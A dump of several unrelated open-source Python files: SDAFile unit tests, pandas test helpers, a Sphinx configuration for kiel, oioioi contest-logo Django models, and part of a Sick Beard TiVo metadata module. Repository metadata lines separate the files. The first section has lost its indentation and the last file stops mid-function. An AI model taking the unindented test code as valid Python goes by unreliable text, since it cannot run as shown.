with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
labels = []
test_set = (
TEST_NUMERIC + TEST_LOGICAL + TEST_CHARACTER + TEST_CELL +
TEST_STRUCTURE + TEST_STRUCTURE + TEST_SPARSE +
TEST_SPARSE_COMPLEX
)
for i, obj in enumerate(test_set):
label = 'test' + str(i)
labels.append(label)
sda_file.insert(label, obj)
with self.assertRaises(ValueError):
sda_file.remove()
with self.assertRaises(ValueError):
sda_file.remove('not a label')
random.shuffle(labels)
removed = labels[::2]
kept = labels[1::2]
with sda_file._h5file('a') as h5file:
set_encoded(h5file.attrs, Updated='Unmodified')
sda_file.remove(*removed)
self.assertEqual(sorted(sda_file.labels()), sorted(kept))
# Make sure metadata is preserved and data can be extracted
with sda_file._h5file('r') as h5file:
for label in kept:
attrs = h5file[label].attrs
self.assertIn('Deflate', attrs)
self.assertIn('Description', attrs)
self.assertIn('RecordType', attrs)
self.assertIn('Empty', attrs)
sda_file.extract(label)
sda_file.remove(*kept)
self.assertEqual(sda_file.labels(), [])
self.assertEqual(sda_file.FormatVersion, '1.1')
self.assertNotEqual(sda_file.Updated, 'Unmodified')
def test_probe(self):
cols = [
'RecordType', 'Description', 'Empty', 'Deflate', 'Complex',
'ArraySize', 'Sparse', 'RecordSize', 'Class', 'FieldNames',
'Command',
]
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
labels = []
for i, obj in enumerate(TEST_NUMERIC[:4]):
label = 'bar' + str(i)
labels.append(label)
sda_file.insert(label, obj, label, i)
for i, obj in enumerate(TEST_NUMERIC[4:6]):
label = 'foo' + str(i)
labels.append(label)
sda_file.insert(label, obj, label, i)
state = sda_file.probe()
state.sort_index()
self.assertEqual(len(state), 6)
assert_array_equal(state.columns, cols)
assert_array_equal(state.index, labels)
assert_array_equal(state['Description'], labels)
assert_array_equal(state['Deflate'], [0, 1, 2, 3, 0, 1])
state = sda_file.probe('bar.*')
state.sort_index()
self.assertEqual(len(state), 4)
assert_array_equal(state.columns, cols)
assert_array_equal(state.index, labels[:4])
assert_array_equal(state['Description'], labels[:4])
assert_array_equal(state['Deflate'], [0, 1, 2, 3])
state = sda_file.probe('foo.*')
state.sort_index()
self.assertEqual(len(state), 2)
assert_array_equal(state.columns, cols)
assert_array_equal(state.index, labels[4:])
assert_array_equal(state['Description'], labels[4:])
assert_array_equal(state['Deflate'], [0, 1])
class TestSDAFileReplaceUpdate(unittest.TestCase):
def test_replace(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
sda_file.insert('test', TEST_NUMERIC[0], 'test_description', 1)
replacements = TEST_NUMERIC[:1]
random.shuffle(replacements)
replacements = replacements[:10]
with sda_file._h5file('a') as h5file:
set_encoded(h5file.attrs, Updated='Unmodified')
for new_data in replacements:
sda_file.replace('test', new_data)
assert_equal(sda_file.extract('test'), new_data)
with sda_file._h5file('r') as h5file:
attrs = get_decoded(
h5file['test'].attrs, 'Deflate', 'Description'
)
self.assertEqual(attrs['Description'], 'test_description')
self.assertEqual(attrs['Deflate'], 1)
self.assertNotEqual(sda_file.Updated, 'Unmodified')
def test_update_object_on_non_object(self):
reference_path = data_path('SDAreference.sda')
with temporary_file() as file_path:
            # Copy the reference, which has an object in it.
shutil.copy(reference_path, file_path)
sda_file = SDAFile(file_path, 'a')
label = 'example A1'
data = sda_file.extract('example I')
with self.assertRaises(ValueError):
sda_file.update_object(label, data)
def test_update_object_with_equivalent_record(self):
reference_path = data_path('SDAreference.sda')
with temporary_file() as file_path:
            # Copy the reference, which has an object in it.
shutil.copy(reference_path, file_path)
sda_file = SDAFile(file_path, 'a')
with sda_file._h5file('a') as h5file:
set_encoded(h5file.attrs, Updated='Unmodified')
label = 'example I'
# Replace some stuff with the same type
data = sda_file.extract(label)
data['Parameter'] = np.arange(5)
sda_file.update_object(label, data)
extracted = sda_file.extract(label)
with sda_file._h5file('r') as h5file:
attrs = get_decoded(h5file['example I'].attrs)
self.assertNotEqual(sda_file.Updated, 'Unmodified')
# Validate equality
self.assertEqual(attrs['RecordType'], 'object')
self.assertEqual(attrs['Class'], 'ExampleObject')
self.assertIsInstance(extracted, dict)
self.assertEqual(len(extracted), 1)
assert_equal(extracted['Parameter'], data['Parameter'])
def test_update_object_with_inequivalent_record(self):
reference_path = data_path('SDAreference.sda')
with temporary_file() as file_path:
            # Copy the reference, which has an object in it.
shutil.copy(reference_path, file_path)
sda_file = SDAFile(file_path, 'a')
label = 'example I'
# Replace some stuff with different type
data = sda_file.extract(label)
data['Parameter'] = 'hello world'
with self.assertRaises(ValueError):
sda_file.update_object(label, data)
def test_update_object_with_non_record(self):
reference_path = data_path('SDAreference.sda')
with temporary_file() as file_path:
            # Copy the reference, which has an object in it.
shutil.copy(reference_path, file_path)
sda_file = SDAFile(file_path, 'a')
label = 'example I'
# Replace some stuff with a non-dictionary
with self.assertRaises(ValueError):
sda_file.update_object(label, 'hello')
def test_update_objects_on_non_objects(self):
reference_path = data_path('SDAreference.sda')
with temporary_file() as file_path:
            # Copy the reference, which has an object in it.
shutil.copy(reference_path, file_path)
sda_file = SDAFile(file_path, 'a')
label = 'example A1'
data = sda_file.extract('example J')
with self.assertRaises(ValueError):
sda_file.update_objects(label, data)
def test_update_objects_with_equivalent_record(self):
reference_path = data_path('SDAreference.sda')
with temporary_file() as file_path:
            # Copy the reference, which has an object in it.
shutil.copy(reference_path, file_path)
sda_file = SDAFile(file_path, 'a')
with sda_file._h5file('a') as h5file:
set_encoded(h5file.attrs, Updated='Unmodified')
label = 'example J'
# Replace some stuff with the same type
data = sda_file.extract(label)
data[0, 0]['Parameter'] = np.arange(5)
sda_file.update_objects(label, data)
extracted = sda_file.extract(label)
with sda_file._h5file('r') as h5file:
attrs = get_decoded(h5file['example J'].attrs)
self.assertNotEqual(sda_file.Updated, 'Unmodified')
# Validate equality
self.assertEqual(attrs['RecordType'], 'objects')
self.assertEqual(attrs['Class'], 'ExampleObject')
self.assertIsInstance(extracted, np.ndarray)
self.assertEqual(extracted.shape, (2, 1))
assert_equal(extracted[0, 0]['Parameter'], data[0, 0]['Parameter'])
assert_equal(extracted[1, 0]['Parameter'], data[1, 0]['Parameter'])
def test_update_objects_with_inequivalent_record(self):
reference_path = data_path('SDAreference.sda')
with temporary_file() as file_path:
            # Copy the reference, which has an object in it.
shutil.copy(reference_path, file_path)
sda_file = SDAFile(file_path, 'a')
label = 'example J'
# Replace some stuff with different type
data = sda_file.extract(label)
data[0, 0]['Parameter'] = 'hello world'
with self.assertRaises(ValueError):
sda_file.update_objects(label, data)
def test_update_objects_with_non_record(self):
reference_path = data_path('SDAreference.sda')
with temporary_file() as file_path:
            # Copy the reference, which has an object in it.
shutil.copy(reference_path, file_path)
sda_file = SDAFile(file_path, 'a')
label = 'example J'
# Replace some stuff with a non-dictionary
with self.assertRaises(ValueError):
sda_file.update_objects(label, 'hello')
| bsd-3-clause | -7,877,897,679,665,350,000 | 35.743869 | 79 | 0.559473 | false |
bibsian/database-development | test/logiclayer/test_helpers.py | 1 | 10556 | #! /usr/bin/env python
import pytest
from pandas import concat, DataFrame, read_csv, to_numeric, wide_to_long
from numpy import where
import re
import decimal as dc
import sys, os
from poplerGUI.logiclayer import class_logconfig as log
from poplerGUI.logiclayer.datalayer import config as orm
rootpath = os.path.dirname(os.path.dirname(os.path.dirname( __file__ )))
end = os.path.sep
sys.path.append(os.path.realpath(os.path.dirname(
rootpath + 'logiclayer' + end)))
os.chdir(rootpath)
def test_wide_to_long_(df_test_6):
data = df_test_6
data['id'] = data.index
new = wide_to_long(
data, ["trait", "growth"], i="id", j="year")
new['year'] = new.index.get_level_values("year")
print(new)
assert ("growth" in new.columns.values.tolist()) is True
assert ("trait" in new.columns.values.tolist()) is True
assert ("year" in new.columns.values.tolist()) is True
assert ("SITE" in new.columns.values.tolist()) is True
new.reset_index(drop=True, inplace=True)
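# Illustrative note (the stub column names here are hypothetical; the df_test_6
# fixture is defined elsewhere): pandas.wide_to_long reshapes stub-named columns
# such as "trait1990"/"trait1991" and "growth1990"/"growth1991" into long format,
# one row per (id, year) pair with plain "trait" and "growth" columns -- which is
# what the assertions above verify.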
# @pytest.fixture
# def check_int():
# def check_int(x):
# ''' helper function to check if text can be converted to int'''
# try:
# int(x)
# return True
# except ValueError:
# return False
#
# return check_int
#
# def test_int_check(check_int):
# ''' test integer checker'''
# assert check_int('4') is True
# assert check_int('word') is False
#
# @pytest.fixture
# def produce_null_df():
# def produce_null_df(ncols, colnames, dflength, nullvalue):
# '''
# Helper function to create a dataframe of null
# values for concatinating with formated data
# '''
# try:
# list(colnames)
# int(ncols)
# int(dflength)
# str(nullvalue)
# except Exception as e:
# print(str(e))
# ValueError('Invalid data types for arguments')
#
# p = re.compile('\w+\s')
# matches = p.match(nullvalue)
# if matches is None:
# nullvalue = (nullvalue + ' ')
#
# allnulls = concat(
# [DataFrame(
# re.sub(' ', ' ', (str(nullvalue)*dflength)).split())]*
# len(colnames), axis=1)
# allnulls.columns = colnames
# return allnulls
#
# return produce_null_df
#
#
# def test_nulldf(produce_null_df):
# '''test null df generator'''
# n = 2
# colnames = ['c1', 'c2']
# dflen = 5
# Note null value MUST be folled by space
# null = 'NULL'
#
# testdf = produce_null_df(n, colnames, dflen, null)
# print(testdf)
# assert (list(testdf.columns) == colnames) is True
# assert ('NULL' in testdf.values) is True
# assert ('NULL' not in testdf.values) is False
# assert (1 not in testdf.values) is True
# assert ('x' not in testdf.values) is True
# assert (len(testdf) == dflen) is True
#
#
# @pytest.fixture
# def decimal_df_col():
# def decimal_df_col(dataframe, colname):
# dataframe[colname].apply(dc.Decimal)
# return dataframe
# return decimal_df_col
#
#
# def test_decimal(decimal_df_col, df_test_2):
# print(df.dtypes)
# decimal_df_col(df, 'DENSITY')
# print(df)
# print(df.dtypes)
#
#
# @pytest.fixture
# def updated_df_values():
# def updated_df_values(olddataframe, newdataframe, logger, name):
# '''
# Helper function to aid in logging the difference between
# dataframes after user have modified the entries.
# For example, inputing latitude and longitude for the site
# table or the extent of spatial replication in the main table.
#
# Arguments:
# olddataframe = An unmodified dataframe
# newdataframe = A user modified dataframe
# logger = An instance of a logger handler
# table = A string with the name to append to log
# '''
# try:
# assert (
# olddataframe.columns.values.tolist() ==
# newdataframe.columns.values.tolist()) is True
# except Exception as e:
# print(str(e))
# raise AttributeError(
# 'Dataframe columns are not equivalent')
# if (
# len(olddataframe) == 0 or
# olddataframe is None or
# len(olddataframe.columns) == 0
# ):
# logger.info('{} "{}"'.format(
# name,
# 'NULL'))
# else:
# diffdf = (olddataframe != newdataframe)
# for i, item in enumerate(diffdf.columns):
# if any(diffdf[item].values.tolist()):
# index = where(diffdf[item].values)[0].tolist()
# logger.info('{} "{}" = {} to {}'.format(
# name,
# item,
# olddataframe.loc[index, item].values.tolist(),
# newdataframe.loc[index, item].values.tolist()))
# else:
# pass
# return updated_df_values
#
#
# @pytest.fixture
# def mylog():
# mylog = log.configure_logger(
# 'tableformat',
# rootpath + end +' logs/test_df_diff.log'
# )
# return mylog
#
# @pytest.fixture
# def metadf_og():
# if sys.platform == "darwin":
# metapath = (
# rootpath + end + 'test' + end + 'Datasets_manual_test' +
# "/meta_file_test.csv")
# elif sys.platform == "win32":
# #=======================#
# #Paths to data and conversion of files to dataframe
# #=======================#
# metapath = (
# rootpath + end + 'test' + end + 'Datasets_manual_test' +
# "/meta_file_test.csv")
#
# metadf = read_csv(metapath, encoding="iso-8859-11")
# return metadf
#
#
# @pytest.fixture
# def metadf_mod(metadf_og):
# new = metadf_og.copy()
# new.loc[3, 'treatment_type'] = 'maybe...'
# return new
#
#
# def test_logger_and_df_diff(updated_df_values, mylog, old, new):
# updated_df_values(old, new, mylog, 'maintable')
#
# def test_logger_and_metadf_diff(
# updated_df_values, mylog, metadf_og, metadf_mod):
# print(metadf_og.columns)
# print(metadf_og.dtypes)
# print('---------------')
# print(metadf_mod.columns)
# print(metadf_mod.dtypes)
# print('----------------')
# updated_df_values(metadf_og, metadf_mod, mylog, 'maintable')
#
#
# @pytest.fixture
# def maindf():
# df = read_csv('DatabaseConfig/main_table_test.csv')
# return df
#
# @pytest.fixture
# def convert_typetest():
# def convert(dataframe, types):
# for i in dataframe.columns:
# if types[i] in ['NUMERIC', 'INTEGER', 'Integer']:
# dataframe[i] = to_numeric(
# dataframe[i], errors='coerce')
# elif types[i] in ['VARCHAR', 'TEXT']:
# dataframe[i] = dataframe[i].astype(object)
# return convert
#
# def test_convert_types(maindf, convert_typetest):
# print(maindf.dtypes)
# convert_typetest(maindf, orm.maintypes)
# print(maindf.dtypes)
#
# @pytest.fixture
# def year_strip():
# def year_strip(dateformat):
# f = dateformat
# found = re.search('Y+', f)
# ylength = len(found.group(0))
# return ylength
# return year_strip
#
# def test_year_strip(year_strip):
# y2 = 'dd - mm - YY (Any Order)'
# y4 = 'dd - mm - YYYY (Any Order)'
# ym2 = 'mm - YY (Any Order)'
# ym4 = 'mm - YYYY (Any Order)'
# y = 'YYYY'
# assert (year_strip(y2) == 2) is True
# assert (year_strip(ym2) == 2) is True
# assert (year_strip(ym4) == 4) is True
# assert (year_strip(y4) == 4) is True
# assert (year_strip(y) == 4) is True
#
# @pytest.fixture
# def write_column_to_log(produce_null_df, updated_df_values):
# def write_column_to_log(dictionary, logger, tablename):
# coldf = DataFrame([dictionary])
# nulldf = produce_null_df(
# len(coldf.values.tolist()),
# coldf.columns.values.tolist(),
# len(coldf),
# 'NULL'
# )
#
# updated_df_values(
# nulldf, coldf, logger, tablename
# )
# return write_column_to_log
#
# def test_write_column(write_column_to_log, mylog):
# testdict = {'columnname':'uniquevalue'}
# write_column_to_log(testdict, mylog, 'testtable')
#
# @pytest.fixture
# def date_strip():
# return read_csv('Datasets_manual_test/raw_data_test_dialogsite.csv')
#
# @pytest.fixture
# def date_strip_test5():
# return read_csv('Datasets_manual_test/raw_data_test_5.csv')
#
# @pytest.fixture
# def strip_time():
# '''
# Function to strip a single date time column
# with all potential delimiters (leaving a space
# where the delimiter used to be). This is necessary
# to standardize the data enabling the effective use
# of the pandas as_datetime method.
# '''
# def strip_time(data, col):
# strippedlist = []
# for i in list(set(col)):
# print([
# re.sub("/|,|-|;"," ", x) for x in list(
# data[i].astype(str))])
# strippedlist.append([
# re.sub("/|,|-|;"," ", x) for x in list(
# data[i].astype(str))])
#
# return strippedlist
#
# return strip_time
#
# def test_strip_time(date_strip, strip_time):
# test = strip_time(date_strip, ['DATE'])
# assert isinstance(test, list) is True
#
# def test_strip_time_test5(date_strip_test5, strip_time):
# Single columns are going to give back nested list
# test = strip_time(date_strip_test5, ['YEAR'])
# print(test)
# assert isinstance(test, list) is True
#
# @pytest.fixture
# def string_to_list():
# def string_to_list(userinput):
# strtolist = re.sub(
# ",\s", " ", userinput.rstrip()).split()
# return strtolist
#
# return string_to_list
#
# def test_string_to_list(string_to_list):
# teststring = 'DEPTH, REP, TEMP'
# test = string_to_list(teststring)
# print(test)
# assert isinstance(test, list) is True
| mit | -2,347,585,119,337,659,000 | 31.090909 | 74 | 0.538462 | false |
wglass/kiel | docs/conf.py | 1 | 10537 | # -*- coding: utf-8 -*-
#
# kiel documentation build configuration file, created by
# sphinx-quickstart on Wed Dec 23 16:22:07 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
import sphinx_bootstrap_theme # noqa
import kiel # noqa
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
'sphinx.ext.extlinks',
]
if not on_rtd:
extensions.append("sphinxcontrib.spelling")
# Add any paths that contain templates here, relative to this directory.
templates_path = ['templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'kiel'
copyright = u'2015-2016, William Glass'
author = u'William Glass'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
version = release = kiel.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
autodoc_member_order = "bysource"
autoclass_content = "both"
autodoc_docstring_signature = False
coverage_skip_undoc_in_source = True
coverage_ignore_modules = []
spelling_word_list_filename = "spelling_wordlist.txt"
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
default_role = "py:obj"
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'trac'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['static']
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme_path = sphinx_bootstrap_theme.get_html_theme_path()
html_theme = 'bootstrap'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
"navbar_links": [
("Clients", "clients"),
("Release Notes", "releases"),
("Source Docs", "source_docs"),
],
'navbar_class': "navbar",
"navbar_site_name": "Site",
"globaltoc_depth": 2,
"globaltoc_includehidden": False,
"navbar_sidebarrel": False,
"navbar_pagenav": True,
"source_link_position": None,
"bootswatch_theme": "paper",
"bootstrap_version": "3",
}
# Add any paths that contain custom themes here, relative to this directory.
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {
# '**': [
# 'about.html', 'navigation.html', 'searchbox.html', 'donate.html',
# ]
# }
extlinks = {
"current_tarball": (
(
"https://pypi.python.org/packages/source/" +
"k/kiel/kiel-%s.tar.g%%s" % version
),
"kiel-%s.tar.g" % version
)
}
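# Illustrative usage of the extlink above (assuming the Sphinx version in use
# appends the role text to the caption): writing :current_tarball:`z` in a .rst
# file renders as "kiel-<version>.tar.gz" and links to the matching source
# tarball on PyPI.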
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'kieldoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
# Latex figure (float) alignment
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(
master_doc, 'kiel.tex', u'kiel Documentation',
u'William Glass', 'manual'
),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(
master_doc, 'kiel', u'kiel Documentation',
[author], 1
)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc, 'kiel', u'kiel Documentation',
author, 'kiel', 'One line description of project.',
'Miscellaneous'
),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
| apache-2.0 | -5,949,879,600,771,875,000 | 30.082596 | 79 | 0.682452 | false |
sio2project/oioioi | oioioi/contestlogo/models.py | 1 | 1997 | import os.path
from django.db import models
from django.utils import timezone
from django.utils.text import get_valid_filename
from django.utils.translation import ugettext_lazy as _
from oioioi.contests.models import Contest
from oioioi.filetracker.fields import FileField
def make_logo_filename(instance, filename):
return 'logo/%s/%s' % (
instance.contest.id,
get_valid_filename(os.path.basename(filename)),
)
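# Illustrative result (values hypothetical): for a contest with id "oi2016" and an
# upload named "My Logo.png", the file is stored under 'logo/oi2016/My_Logo.png'.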
class ContestLogo(models.Model):
contest = models.OneToOneField(
Contest, verbose_name=_("contest"), primary_key=True, on_delete=models.CASCADE
)
image = FileField(upload_to=make_logo_filename, verbose_name=_("logo image"))
updated_at = models.DateTimeField(default=timezone.now)
link = models.URLField(
blank=True, null=True, verbose_name=_("external contest webpage url")
)
def save(self, *args, **kwargs):
self.updated_at = timezone.now()
return super(ContestLogo, self).save(*args, **kwargs)
@property
def filename(self):
return os.path.split(self.image.name)[1]
class Meta(object):
verbose_name = _("contest logo")
verbose_name_plural = _("contest logo")
def make_icon_filename(instance, filename):
return 'icons/%s/%s' % (
instance.contest.id,
get_valid_filename(os.path.basename(filename)),
)
class ContestIcon(models.Model):
contest = models.ForeignKey(
Contest, verbose_name=_("contest"), on_delete=models.CASCADE
)
image = FileField(upload_to=make_icon_filename, verbose_name=_("icon image"))
updated_at = models.DateTimeField(default=timezone.now)
def save(self, *args, **kwargs):
self.updated_at = timezone.now()
return super(ContestIcon, self).save(*args, **kwargs)
@property
def filename(self):
return os.path.split(self.image.name)[1]
class Meta(object):
verbose_name = _("contest icon")
verbose_name_plural = _("contest icons")
| gpl-3.0 | -4,766,905,731,717,114,000 | 29.257576 | 86 | 0.667501 | false |
wimac/home | Dropbox/skel/bin/sick-beard/sickbeard/metadata/tivo.py | 1 | 13268 | # Author: Nic Wolfe <[email protected]>
# Author: Gordon Turner <[email protected]>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of Sick Beard.
#
# Sick Beard is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Sick Beard is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Sick Beard. If not, see <http://www.gnu.org/licenses/>.
import datetime
import os
import sickbeard
#from sickbeard.common import *
from sickbeard import logger, exceptions, helpers
from sickbeard.metadata import generic
from sickbeard import encodingKludge as ek
from lib.tvdb_api import tvdb_api, tvdb_exceptions
class TIVOMetadata(generic.GenericMetadata):
"""
Metadata generation class for TIVO
The following file structure is used:
show_root/Season 01/show - 1x01 - episode.avi.txt (* existing episode)
show_root/Season 01/.meta/show - 1x01 - episode.avi.txt (episode metadata)
    This class only generates episode-specific metadata files; it does NOT generate a default.txt file.
"""
def __init__(self,
show_metadata=False,
episode_metadata=False,
poster=False,
fanart=False,
episode_thumbnails=False,
season_thumbnails=False):
generic.GenericMetadata.__init__(self,
show_metadata,
episode_metadata,
poster,
fanart,
episode_thumbnails,
season_thumbnails)
self._ep_nfo_extension = "txt"
self.generate_ep_metadata = True
self.name = 'TIVO'
self.eg_show_metadata = "<i>not supported</i>"
self.eg_episode_metadata = "Season##\\.meta\\<i>filename</i>.txt"
self.eg_fanart = "<i>not supported</i>"
self.eg_poster = "<i>not supported</i>"
self.eg_episode_thumbnails = "<i>not supported</i>"
self.eg_season_thumbnails = "<i>not supported</i>"
# Override with empty methods for unsupported features.
def create_show_metadata(self, show_obj):
pass
def create_fanart(self, show_obj):
pass
def get_episode_thumb_path(self, ep_obj):
pass
def get_season_thumb_path(self, show_obj, season):
pass
def retrieveShowMetadata(self, dir):
return (None, None)
# Override and implement features for Tivo.
def get_episode_file_path(self, ep_obj):
"""
Returns a full show dir/.meta/episode.txt path for Tivo
episode metadata files.
        Note that pyTivo requires the metadata filename to include the original extension;
        i.e. if the episode file is foo.avi, the metadata file name is foo.avi.txt.
ep_obj: a TVEpisode object to get the path for
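        Illustrative example (paths hypothetical): for an episode located at
        /tv/Show/Season 01/Show - 1x01 - Pilot.avi this returns
        /tv/Show/Season 01/.meta/Show - 1x01 - Pilot.avi.txt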
"""
if ek.ek(os.path.isfile, ep_obj.location):
metadata_file_name = ek.ek(os.path.basename, ep_obj.location) + "." + self._ep_nfo_extension
metadata_dir_name = ek.ek(os.path.join, ek.ek(os.path.dirname, ep_obj.location), '.meta')
metadata_file_path = ek.ek(os.path.join, metadata_dir_name, metadata_file_name)
else:
logger.log(u"Episode location doesn't exist: "+str(ep_obj.location), logger.DEBUG)
return ''
return metadata_file_path
def _ep_data(self, ep_obj):
"""
Creates a key value structure for a Tivo episode metadata file and
returns the resulting data object.
ep_obj: a TVEpisode instance to create the metadata file for.
Lookup the show in http://thetvdb.com/ using the python library:
https://github.com/dbr/tvdb_api/
The results are saved in the object myShow.
The key values for the tivo metadata file are from:
http://pytivo.sourceforge.net/wiki/index.php/Metadata
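        Illustrative output sketch (values hypothetical): the returned string is a
        series of "key : value" lines such as "title : The Simpsons",
        "episodeTitle : Homer's Night Out", "episodeNumber : 10" and
        "isEpisode : true", followed by description, seriesId, callsign,
        originalAirDate, vActor, starRating, tvRating and vProgramGenre entries
        when available.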
"""
        data = ""
eps_to_write = [ep_obj] + ep_obj.relatedEps
tvdb_lang = ep_obj.show.lang
try:
# There's gotta be a better way of doing this but we don't wanna
# change the language value elsewhere
ltvdb_api_parms = sickbeard.TVDB_API_PARMS.copy()
if tvdb_lang and not tvdb_lang == 'en':
ltvdb_api_parms['language'] = tvdb_lang
t = tvdb_api.Tvdb(actors=True, **ltvdb_api_parms)
myShow = t[ep_obj.show.tvdbid]
except tvdb_exceptions.tvdb_shownotfound, e:
raise exceptions.ShowNotFoundException(str(e))
except tvdb_exceptions.tvdb_error, e:
logger.log("Unable to connect to TVDB while creating meta files - skipping - "+str(e), logger.ERROR)
return False
for curEpToWrite in eps_to_write:
try:
myEp = myShow[curEpToWrite.season][curEpToWrite.episode]
except (tvdb_exceptions.tvdb_episodenotfound, tvdb_exceptions.tvdb_seasonnotfound):
logger.log("Unable to find episode " + str(curEpToWrite.season) + "x" + str(curEpToWrite.episode) + " on tvdb... has it been removed? Should I delete from db?")
return None
if myEp["firstaired"] == None and ep_obj.season == 0:
myEp["firstaired"] = str(datetime.date.fromordinal(1))
if myEp["episodename"] == None or myEp["firstaired"] == None:
return None
if myShow["seriesname"] != None:
# Title of the series (The Simpsons, Seinfeld, etc.) or title of the movie (The Mummy, Spiderman, etc).
data += ("title : " + myShow["seriesname"] + "\n")
# Name of series (The Simpsons, Seinfeld, etc.). This should be included if the show is episodic.
